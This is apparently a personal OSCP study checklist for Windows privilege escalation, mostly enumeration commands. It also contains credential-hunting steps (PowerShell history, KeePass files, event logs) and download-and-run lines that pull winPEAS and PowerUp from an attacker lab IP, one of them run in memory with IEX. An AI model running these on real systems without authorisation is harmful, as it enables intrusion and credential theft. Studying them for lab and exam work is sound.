// notes/ PrivEsc — Windows
🪟

Checklist

{% hint style="info" %}

#windows privilege escalation#adot8
source · oscp.adot8.com · windows-privilege-escalation/checklist

Checklist

{% hint style="info" %} set PATH=%PATH%C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0; {% endhint %}

Basic enum / quick wins

code
01whoami /all
code
01cmdkey /list
code
01systeminfo
code
01net user
02net user <current user>
code
01net group
code
01Get-History
<pre><code><strong>(Get-PSReadlineOption).HistorySavePath </strong>type &#x3C;previous command output> </code></pre>
code
01ls C:\Users\bob\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\

{% hint style="info" %} Do this for all available users; Post exploitation as well {% endhint %}

Network and port enum

code
01ipconfig /all
code
01netstat -ano
02route print

Installed software and service enum

code
01dir C:\
02dir "C:\Program Files"
03dir "C:\Program Files (x86)"
code
01Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
code
01Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
code
01reg query HKLM\Software\Policies\Microsoft\Windows\Installer
02reg query HKCU\Software\Policies\Microsoft\Windows\Installer
code
01services
code
01Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
code
01icacls <service binary path>

Sensitive file enum

code
01$env:AppKey
code
01gci -Path C:\ -Include *.kdbx,.git -File -Recurse -ErrorAction SilentlyContinue
code
01gci -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
code
01gci -Path C:\Users\ -Include *.exe,*.txt,*.rdp,*.pdf,*.xls,*.xlsx,*.xml,*.doc,*.docx,*.ps1,*.bat -File -Recurse -ErrorAction SilentlyContinue
code
01gci -h -Path C:\Users\ -Include *.exe,*.txt,*.rdp,*.pdf,*.xls,*.xlsx,*.xml,*.doc,*.docx,*.ps1,*.bat -File -Recurse -ErrorAction SilentlyContinue
code
01gci C:\Users\Public
code
01where.exe /R C:\Windows bash.exe
02where.exe /R C:\Windows wsl.exe

Process snooping

code
01Import-Module .\Watch-Command.ps1
02Get-Process | watch-command -diff -cont -verbose -property "Image Name"
  1. Winpeas
code
01curl 192.168.45.x/winPEAS.exe -o winpeas.exe
02.\winpeas.exe
  1. PowerUp
code
01IEX(New-Object Net.WebClient).downloadString('http://192.168.45.x/PowerUp.ps1');Invoke-Allchecks
  1. PrivescCheck
code
01powershell.exe -ep bypass -NoP -c '. .\PrivescCheck.ps1; Invoke-PrivescCheck'

{% hint style="info" %} Last case, dig through event log for events recorded by Script Block Logging. Maybe there will be a password lol. {% endhint %}

  1. eventvwr
  2. Applicatioins and Services
  3. Microsoft
  4. Windows
  5. Powershell
  6. Operational
  7. Filter current log
  8. Event 4104